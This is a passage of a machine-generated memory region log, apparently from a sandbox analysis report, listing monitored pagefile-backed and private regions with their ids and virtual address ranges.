0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5751 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5752 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5753 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5754 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5755 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5756 start_va = 0x1ea0000 end_va = 0x1ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 5757 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5758 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5759 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5760 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5761 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5762 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5763 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5764 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5765 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5766 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5767 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5768 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5769 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5770 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5771 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5772 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5773 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5774 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5775 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5776 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5777 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5795 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5796 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5797 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5798 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5814 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5815 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5819 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5820 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5821 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5822 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5823 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5824 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5825 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5826 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5827 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5828 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5829 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5830 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5831 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5832 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5833 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5834 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5858 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5859 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5863 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5864 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5865 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5866 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5867 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5868 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5869 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5870 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5871 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5872 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5873 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5874 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5875 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5876 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5877 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5878 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5879 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5880 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5881 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5882 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5883 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5884 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5885 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5886 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5887 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5888 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5889 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5890 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5891 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5892 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5893 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5894 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5895 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5896 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5919 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5920 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5921 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5922 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5923 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5924 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5925 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5926 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5927 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5928 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5929 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5930 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5932 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5933 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5934 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5935 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = 